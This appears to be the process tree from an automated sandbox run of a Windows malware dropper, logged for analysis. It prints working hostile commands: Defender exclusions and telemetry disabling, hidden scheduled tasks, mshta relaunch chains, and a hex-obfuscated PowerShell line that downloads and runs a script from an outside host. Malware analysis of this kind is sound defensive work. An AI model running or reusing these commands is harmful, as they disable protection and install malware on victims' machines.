C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:7020
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:12600
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"15⤵PID:14296
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:14460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:14796
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True18⤵PID:16440
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"14⤵PID:7920
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&15⤵PID:8228
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3216⤵PID:1928
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6416⤵PID:9984
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"14⤵PID:4988
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&15⤵PID:2808
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3216⤵PID:3812
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6416⤵PID:9388
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbcrHBMVq" /SC once /ST 01:32:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="14⤵
- Creates scheduled task(s)
PID:3804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bDBWsoVwBAvMkkOeMa" /SC once /ST 06:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YIhRuNolBGOHadBpz\nnWxgLQozaxYwkg\qAoVzGW.exe\" rF /site_id 668658 /S" /V1 /F14⤵
- Creates scheduled task(s)
PID:9676
-
-
-
-
-
C:\Users\Admin\Documents\nxfOBZ7N7BTND0tSNqWtavVB.exe"C:\Users\Admin\Documents\nxfOBZ7N7BTND0tSNqWtavVB.exe"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
PID:6160 -
C:\Users\Admin\Documents\nxfOBZ7N7BTND0tSNqWtavVB.exe"C:\Users\Admin\Documents\nxfOBZ7N7BTND0tSNqWtavVB.exe"12⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4648
-
-
-
C:\Users\Admin\Documents\NuOAa7zWhZeI6KdcezvqVBXb.exe"C:\Users\Admin\Documents\NuOAa7zWhZeI6KdcezvqVBXb.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6528
-
-
C:\Users\Admin\Documents\5TOoLBEwKjxTgqEGuFABMEWV.exe"C:\Users\Admin\Documents\5TOoLBEwKjxTgqEGuFABMEWV.exe"11⤵PID:6224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6224 -s 24412⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8404
-
-
-
C:\Users\Admin\Documents\ObcQTgXH4oFGTP1M9zyegbPI.exe"C:\Users\Admin\Documents\ObcQTgXH4oFGTP1M9zyegbPI.exe"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6328
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwf1zjbd.pzu\Vidboxinc.exe & exit9⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\pwf1zjbd.pzu\Vidboxinc.exeC:\Users\Admin\AppData\Local\Temp\pwf1zjbd.pzu\Vidboxinc.exe10⤵PID:2224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 29611⤵
- Program crash
- Enumerates system info in registry
PID:6440
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ebvhj1oz.w4h\gcleaner.exe /mixfive & exit9⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\ebvhj1oz.w4h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ebvhj1oz.w4h\gcleaner.exe /mixfive10⤵PID:1560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 28411⤵
- Program crash
- Checks processor information in registry
PID:6428
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h4qdkpmx.e3b\bumperWW1.exe & exit9⤵PID:1656
-
C:\Users\Admin\AppData\Local\Temp\h4qdkpmx.e3b\bumperWW1.exeC:\Users\Admin\AppData\Local\Temp\h4qdkpmx.e3b\bumperWW1.exe10⤵PID:1768
-
C:\Users\Admin\Documents\OiTbYj2liOBwWBrz534PqRKS.exe"C:\Users\Admin\Documents\OiTbYj2liOBwWBrz534PqRKS.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7512
-
-
C:\Users\Admin\Documents\Z5msPDyEDBitZr1tnMrYbbNP.exe"C:\Users\Admin\Documents\Z5msPDyEDBitZr1tnMrYbbNP.exe"11⤵
- Adds Run key to start application
PID:7604 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe12⤵PID:7832
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm12⤵PID:5164
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:6516
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm14⤵PID:8208
-
-
C:\Windows\SysWOW64\PING.EXEping localhost14⤵
- Runs ping.exe
PID:8756
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comRimasta.exe.com J14⤵PID:8748
-
-
-
-
-
C:\Users\Admin\Documents\8cfNUwE6P_yQV3TE1Ozyy1uo.exe"C:\Users\Admin\Documents\8cfNUwE6P_yQV3TE1Ozyy1uo.exe"11⤵
- Suspicious use of SetThreadContext
PID:7596 -
C:\ProgramData\StubMonoDLL.exe"C:\ProgramData\StubMonoDLL.exe"12⤵PID:6236
-
-
C:\Users\Admin\Documents\8cfNUwE6P_yQV3TE1Ozyy1uo.exe"C:\Users\Admin\Documents\8cfNUwE6P_yQV3TE1Ozyy1uo.exe"12⤵PID:8476
-
-
-
C:\Users\Admin\Documents\W2Rji0DcE5mDQh9kZnYaMoBB.exe"C:\Users\Admin\Documents\W2Rji0DcE5mDQh9kZnYaMoBB.exe"11⤵PID:7588
-
-
C:\Users\Admin\Documents\TqUaKAjOaYYSlALxbRqe2mlv.exe"C:\Users\Admin\Documents\TqUaKAjOaYYSlALxbRqe2mlv.exe"11⤵
- Drops file in Program Files directory
PID:7580 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"12⤵PID:6672
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"12⤵
- Checks whether UAC is enabled
PID:6380
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"12⤵PID:2224
-
-
-
C:\Users\Admin\Documents\FQV7LsPiUL4WOzdhHCs4E9xN.exe"C:\Users\Admin\Documents\FQV7LsPiUL4WOzdhHCs4E9xN.exe"11⤵
- Drops file in Program Files directory
PID:7572 -
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"12⤵PID:2012
-
C:\Users\Admin\Documents\44yjFtbGqrPH07nEQRgEXDcU.exe"C:\Users\Admin\Documents\44yjFtbGqrPH07nEQRgEXDcU.exe"13⤵PID:6812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 31214⤵
- Program crash
PID:6968
-
-
-
C:\Users\Admin\Documents\1q5lzX7XU6ThF6oGF1FV7eif.exe"C:\Users\Admin\Documents\1q5lzX7XU6ThF6oGF1FV7eif.exe"13⤵PID:8036
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\1q5lzX7XU6ThF6oGF1FV7eif.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\1q5lzX7XU6ThF6oGF1FV7eif.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )14⤵PID:7416
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\1q5lzX7XU6ThF6oGF1FV7eif.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\1q5lzX7XU6ThF6oGF1FV7eif.exe" ) do taskkill -iM "%~nxq" /f15⤵PID:8992
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "1q5lzX7XU6ThF6oGF1FV7eif.exe" /f16⤵
- Kills process with taskkill
PID:8196
-
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G16⤵PID:7288
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )17⤵PID:6312
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f18⤵PID:2028
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs17⤵
- Loads dropped DLL
PID:4916
-
-
-
-
-
-
C:\Users\Admin\Documents\tgLogWUSgi5FCS0Zo2rYqwux.exe"C:\Users\Admin\Documents\tgLogWUSgi5FCS0Zo2rYqwux.exe"13⤵PID:8928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8928 -s 29614⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
PID:5392
-
-
-
C:\Users\Admin\Documents\NVhdGXxMEbiCxRZCrvBoNQZV.exe"C:\Users\Admin\Documents\NVhdGXxMEbiCxRZCrvBoNQZV.exe"13⤵PID:3560
-
-
C:\Users\Admin\Documents\jEb1CAjLHcF2wOi2e7NRf9Bt.exe"C:\Users\Admin\Documents\jEb1CAjLHcF2wOi2e7NRf9Bt.exe" /mixtwo13⤵PID:8128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8128 -s 28414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2976
-
-
-
C:\Users\Admin\Documents\mLSRmRfaA1iQmoMMPo8uYkLW.exe"C:\Users\Admin\Documents\mLSRmRfaA1iQmoMMPo8uYkLW.exe"13⤵PID:4588
-
C:\ProgramData\6067627.exe"C:\ProgramData\6067627.exe"14⤵
- Suspicious behavior: SetClipboardViewer
PID:6288
-
-
C:\ProgramData\4038902.exe"C:\ProgramData\4038902.exe"14⤵PID:5940
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5940 -s 228815⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Program crash
- Enumerates system info in registry
PID:3820
-
-
-
C:\ProgramData\7476425.exe"C:\ProgramData\7476425.exe"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7032
-
-
C:\ProgramData\1963944.exe"C:\ProgramData\1963944.exe"14⤵PID:7788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7788 -s 241615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:21360
-
-
-
-
C:\Users\Admin\Documents\cK774fpPnpL5nJ9auhYoguY0.exe"C:\Users\Admin\Documents\cK774fpPnpL5nJ9auhYoguY0.exe"13⤵PID:7556
-
-
C:\Users\Admin\Documents\Uo0kyENcsB7TB0lHYdza7lvT.exe"C:\Users\Admin\Documents\Uo0kyENcsB7TB0lHYdza7lvT.exe"13⤵PID:7484
-
C:\Users\Admin\AppData\Local\Temp\is-SH9L8.tmp\Uo0kyENcsB7TB0lHYdza7lvT.tmp"C:\Users\Admin\AppData\Local\Temp\is-SH9L8.tmp\Uo0kyENcsB7TB0lHYdza7lvT.tmp" /SL5="$405B8,506127,422400,C:\Users\Admin\Documents\Uo0kyENcsB7TB0lHYdza7lvT.exe"14⤵
- Loads dropped DLL
PID:6964 -
C:\Users\Admin\AppData\Local\Temp\is-118MO.tmp\el34zAN.exe"C:\Users\Admin\AppData\Local\Temp\is-118MO.tmp\el34zAN.exe" /S /UID=12415⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Drivers directory
PID:6532 -
C:\Users\Admin\AppData\Local\Temp\4e-1d740-5ea-b379a-a04354150cdb3\Jaehymebaegu.exe"C:\Users\Admin\AppData\Local\Temp\4e-1d740-5ea-b379a-a04354150cdb3\Jaehymebaegu.exe"16⤵PID:9756
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xr3kyzor.fai\GcleanerEU.exe /eufive & exit17⤵PID:16072
-
C:\Users\Admin\AppData\Local\Temp\xr3kyzor.fai\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\xr3kyzor.fai\GcleanerEU.exe /eufive18⤵PID:9708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9708 -s 27619⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10868
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c2jop2n3.vwp\installer.exe /qn CAMPAIGN="654" & exit17⤵PID:21136
-
C:\Users\Admin\AppData\Local\Temp\c2jop2n3.vwp\installer.exeC:\Users\Admin\AppData\Local\Temp\c2jop2n3.vwp\installer.exe /qn CAMPAIGN="654"18⤵PID:6588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rqrlzivh.rps\anyname.exe & exit17⤵PID:21188
-
C:\Users\Admin\AppData\Local\Temp\rqrlzivh.rps\anyname.exeC:\Users\Admin\AppData\Local\Temp\rqrlzivh.rps\anyname.exe18⤵PID:1532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qua4uoih.zq3\gcleaner.exe /mixfive & exit17⤵PID:2168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵PID:2872
-
-
C:\Users\Admin\AppData\Local\Temp\qua4uoih.zq3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\qua4uoih.zq3\gcleaner.exe /mixfive18⤵
- Executes dropped EXE
PID:5540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 28019⤵
- Program crash
PID:10792
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:8604 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:8828
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:4472
-
-
-
C:\Users\Admin\Documents\4Jozz6fNGXJtL5VIMdAv37rv.exe"C:\Users\Admin\Documents\4Jozz6fNGXJtL5VIMdAv37rv.exe"11⤵PID:7564
-
-
C:\Users\Admin\Documents\7uH7gQXTT7Ke_0rphJPrKI0l.exe"C:\Users\Admin\Documents\7uH7gQXTT7Ke_0rphJPrKI0l.exe"11⤵PID:7556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 32012⤵
- Program crash
- Checks processor information in registry
PID:3928
-
-
-
C:\Users\Admin\Documents\qIleTZygmTVXFwtCUjJBitL8.exe"C:\Users\Admin\Documents\qIleTZygmTVXFwtCUjJBitL8.exe"11⤵PID:7548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 31212⤵
- Program crash
- Checks processor information in registry
PID:8896
-
-
-
C:\Users\Admin\Documents\rffxRXdLIHxPawWrlBawP26B.exe"C:\Users\Admin\Documents\rffxRXdLIHxPawWrlBawP26B.exe"11⤵
- Suspicious use of SetThreadContext
PID:7540 -
C:\Users\Admin\Documents\rffxRXdLIHxPawWrlBawP26B.exe"C:\Users\Admin\Documents\rffxRXdLIHxPawWrlBawP26B.exe"12⤵PID:4592
-
-
-
C:\Users\Admin\Documents\5EX78nuUoq2yG11mnlT26Zrs.exe"C:\Users\Admin\Documents\5EX78nuUoq2yG11mnlT26Zrs.exe"11⤵
- Suspicious use of SetWindowsHookEx
PID:7532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SOS='24#4e#61#6e#6f#3d#27#4a#4f#4f#45#58#27#2e#72#65#70#6c#61#63#65#28#27#4a#4f#4f#27#2c#27#49#27#29#3b#73#61#6c#20#4f#59#20#24#4e#61#6e#6f#3b#64#6f#20#7b#24#70#69#6e#67#20#3d#20#74#65#73#74#2d#63#6f#6e#6e#65#63#74#69#6f#6e#20#2d#63#6f#6d#70#20#67#6f#6f#67#6c#65#2e#63#6f#6d#20#2d#63#6f#75#6e#74#20#31#20#2d#51#75#69#65#74#7d#20#75#6e#74#69#6c#20#28#24#70#69#6e#67#29#3b#24#70#32#32#20#3d#20#5b#45#6e#75#6d#5d#3a#3a#54#6f#4f#62#6a#65#63#74#28#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#54#79#70#65#5d#2c#20#33#30#37#32#29#3b#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#72#76#69#63#65#50#6f#69#6e#74#4d#61#6e#61#67#65#72#5d#3a#3a#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#20#3d#20#24#70#32#32#3b#24#61#61#3d#27#77#68#65#78#2d#4f#62#68#65#78#6a#65#27#3b#24#6c#6c#3d#27#28#27#27#68#68#65#78#74#74#68#65#78#70#73#3a#68#65#78#2f#68#65#78#68#65#78#2f#6d#61#6e#6f#72#61#6b#75#73#2e#74#6f#70#2f#50#30#57#33#52#31#2f#49#4e#2e#50#4e#47#27#27#29#27#3b#20#24#62#62#3d#27#63#68#65#78#74#20#4e#65#68#65#78#68#65#78#74#2e#57#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#66#66#3d#27#6c#6f#68#65#78#68#65#78#61#64#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#53#27#3b#20#24#68#68#3d#27#74#68#65#78#68#65#78#72#69#68#65#78#68#65#78#68#65#78#6e#67#27#3b#20#24#63#31#3d#27#28#68#65#78#68#65#78#4e#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#63#63#3d#27#62#43#68#65#78#68#65#78#68#65#78#6c#69#65#68#65#78#68#65#78#68#65#78#6e#74#27#3b#20#24#64#64#3d#27#29#2e#44#6f#68#65#78#68#65#78#68#65#78#68#65#78#77#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#6e#27#3b#20#24#52#4f#4f#4d#3d#28#24#63#31#2c#24#61#61#2c#24#62#62#2c#24#63#63#2c#24#64#64#2c#24#66#66#2c#24#68#68#2c#24#6c#6c#20#2d#4a#6f#69#6e#20#27#27#29#3b#24#52#4f#4f#4d#3d#24#52#4f#4f#4d#2e#72#65#70#6c#61#63#65#28#27#68#65#78#27#2c#20#27#27#29#3b#20#4f#59#20#24#52#4f#4f#4d#7c#4f#59#3b';Invoke-Expression (-join ($SOS -split '#' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))12⤵
- Blocklisted process makes network request
- Adds Run key to start application
PID:7300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Admin\AppData\Roaming\Desktop\Desktop.ps113⤵
- Blocklisted process makes network request
PID:10036
-
-
-
-
C:\Users\Admin\Documents\BHeZh35fgNiwptXQndSkcrHA.exe"C:\Users\Admin\Documents\BHeZh35fgNiwptXQndSkcrHA.exe"11⤵PID:7748
-
-
C:\Users\Admin\Documents\IWs5GW4Q_jjvFaBBnK4lFWz1.exe"C:\Users\Admin\Documents\IWs5GW4Q_jjvFaBBnK4lFWz1.exe"11⤵PID:7856
-
-
C:\Users\Admin\Documents\wLnsNy92SanxmVFpBjGPAs7o.exe"C:\Users\Admin\Documents\wLnsNy92SanxmVFpBjGPAs7o.exe"11⤵PID:7776
-
-
C:\Users\Admin\Documents\HmV0IXtqSgU3SR7wnE5PDqFu.exe"C:\Users\Admin\Documents\HmV0IXtqSgU3SR7wnE5PDqFu.exe"11⤵PID:7740
-
-
C:\Users\Admin\Documents\1qlHgPWU6QnlCBB28k4JAhDY.exe"C:\Users\Admin\Documents\1qlHgPWU6QnlCBB28k4JAhDY.exe"11⤵PID:7732
-
C:\Users\Admin\Documents\1qlHgPWU6QnlCBB28k4JAhDY.exe"C:\Users\Admin\Documents\1qlHgPWU6QnlCBB28k4JAhDY.exe"12⤵PID:8016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 108812⤵
- Program crash
PID:832
-
-
-
C:\Users\Admin\Documents\H9VplkD_jTFUgvnMwplP1loe.exe"C:\Users\Admin\Documents\H9VplkD_jTFUgvnMwplP1loe.exe"11⤵PID:7676
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\H9VplkD_jTFUgvnMwplP1loe.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\H9VplkD_jTFUgvnMwplP1loe.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )12⤵PID:1904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\H9VplkD_jTFUgvnMwplP1loe.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\H9VplkD_jTFUgvnMwplP1loe.exe" ) do taskkill /f -im "%~nxA"13⤵PID:8244
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "H9VplkD_jTFUgvnMwplP1loe.exe"14⤵
- Kills process with taskkill
PID:5796
-
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV14⤵PID:7660
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj15⤵
- Loads dropped DLL
PID:6176
-
-
-
-
-
-
C:\Users\Admin\Documents\I8ToLyIIEqI8jzuDlkumOKFm.exe"C:\Users\Admin\Documents\I8ToLyIIEqI8jzuDlkumOKFm.exe"11⤵PID:7668
-
-
C:\Users\Admin\Documents\euE204iSV7uVbWi_QxtaWmn3.exe"C:\Users\Admin\Documents\euE204iSV7uVbWi_QxtaWmn3.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7996
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qom1tbzv.j0v\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:6592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0i5ctiur.wlw\installer.exe /qn CAMPAIGN=654 & exit9⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\0i5ctiur.wlw\installer.exeC:\Users\Admin\AppData\Local\Temp\0i5ctiur.wlw\installer.exe /qn CAMPAIGN=65410⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3012
-
-
-
